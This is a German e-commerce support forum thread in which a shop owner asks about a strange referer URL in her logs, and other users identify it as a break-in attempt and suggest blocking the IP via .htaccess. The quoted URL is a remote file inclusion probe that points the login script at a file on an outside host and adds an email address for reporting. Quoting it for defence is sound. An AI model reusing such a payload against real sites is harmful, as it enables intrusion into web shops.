#1 (permalink)  
Alt 13.05.2008, 18:06
Benutzerbild von kindspech
Erfahrener Benutzer
 
Registriert seit: 09.02.2007
Beiträge: 358
Frage Seltsamer Gast im Shop

Heute war ein seltsamer Gast online:

IP-Adresse koreanisch
Referer URL: /login.php?XTCsid=http://www.zoo-metelen.de/sender.txt?&server=www.kindspech.de/login.php?XTCsid=&to=xxx@gmail.com

Was heisst denn das? hat der Zoo Metelen einen Newsletter verschickt? die Google-Mailadresse hab ich ge-xxx-t, da steht eine richtige drin...

Viele Grüße
Natascha
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!
Mit Zitat antworten
  #2 (permalink)  
Alt 13.05.2008, 21:52
Erfahrener Benutzer
 
Registriert seit: 26.12.2005
Beiträge: 461
Standard

ja, klingt nach einem einbruchsversuch
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!
Mit Zitat antworten
  #3 (permalink)  
Alt 13.05.2008, 21:55
Benutzerbild von kindspech
Erfahrener Benutzer
 
Registriert seit: 09.02.2007
Beiträge: 358
Standard

später war noch ein ähnlicher Gast online, gleiche Emailadresse in der Referer URL, aber andere Website (www.biomed.ua/)

besoners das "to" vor der Emailadresse macht mich stutzig...

kann denn nun was passieren???
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!
Mit Zitat antworten
  #4 (permalink)  
Alt 13.05.2008, 22:00
Erfahrener Benutzer
 
Registriert seit: 26.12.2005
Beiträge: 461
Standard

nein, soweit ich weiß ist der shop so ziemlich sicher und bietet wenig angriffsfläche
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!
Mit Zitat antworten
  #5 (permalink)  
Alt 13.05.2008, 22:25
tuvalu
Gast
 
Beiträge: n/a
Standard

Die Datei http://www.zoo-metelen.de/sender.txt existiert nicht. Habe das auch im Shop. Das letzte mal kam die IP aus China. Habe sie gesperrt.

Hast Du überprüft welche IP das bei Dir war?

My2Cent
tuvalu
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!
Mit Zitat antworten
  #6 (permalink)  
Alt 13.05.2008, 22:28
Benutzerbild von kindspech
Erfahrener Benutzer
 
Registriert seit: 09.02.2007
Beiträge: 358
Standard

hab beide Male einen Screenshot gemacht... waren aber unterschiedliche IPs. die Frage ist, ob das Sperren der IPs was bringt, denn das nächste Mal ist es vielleicht wieder eine andere...

wie funktioniert das Sperren eigentlich??
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!
Mit Zitat antworten
  #7 (permalink)  
Alt 13.05.2008, 22:50
tuvalu
Gast
 
Beiträge: n/a
Standard

Zitat:
Zitat von kindspech Beitrag anzeigen
wie funktioniert das Sperren eigentlich??
An die .htaccess im root-Verzeichnis des Shops folgendes anhängen:
Code:
deny from 61.142.80.108
My2Cent
tuvalu
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!
Mit Zitat antworten
  #8 (permalink)  
Alt 13.05.2008, 23:06
Benutzerbild von kindspech
Erfahrener Benutzer
 
Registriert seit: 09.02.2007
Beiträge: 358
Standard

hey danke!!!!
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!
Mit Zitat antworten
  #9 (permalink)  
Alt 14.05.2008, 06:44
Benutzerbild von kindspech
Erfahrener Benutzer
 
Registriert seit: 09.02.2007
Beiträge: 358
Standard

genau die IP Adresse hatte ich nun auch zweimal online, ich kann dir noch diese anbieten: 211.233.68.233 - das ist die aus Korea..

Also Leutes, sperrt die beiden IPs! HIer sind Hacker unterwegs!
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!
Mit Zitat antworten
  #10 (permalink)  
Alt 14.05.2008, 08:32
Vio Vio ist offline
Erfahrener Benutzer
 
Registriert seit: 27.03.2006
Beiträge: 1.660
Standard

Hallo Natascha ,

hast Du Dir mal bot-trap angesehen.
Da sind die meisten dieser IP´s schon gesperrt.
Findest Du in Deinem Shop eine neue, meldest Du die an bot-trap und bei allen, die bot-trap nutzen,bleibt der Spammer draußen.

Grüße
Vio
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!
Mit Zitat antworten
Antwort

Lesezeichen

Stichworte
gast, seltsamer, shop

Themen-Optionen
Ansicht

Forumregeln
Es ist dir nicht erlaubt, neue Themen zu verfassen.
Es ist dir nicht erlaubt, auf Beiträge zu antworten.
Es ist dir nicht erlaubt, Anhänge hochzuladen.
Es ist dir nicht erlaubt, deine Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks are aus
Pingbacks are aus
Refbacks are aus


Ähnliche Themen
Thema Autor Forum Antworten Letzter Beitrag
Einsprachiger Shop - nur Deutsch bzw. eigentlich englisch nomad Allgemeine Diskussionen 5 02.11.2006 16:35


Alle Zeitangaben in WEZ +1. Es ist jetzt 14:15 Uhr.

Copyright © 2011 xt:Commerce GmbH / xt:Commerce International Ltd. - All Rights Reserved

xt:Commerce is a SafeCharge brand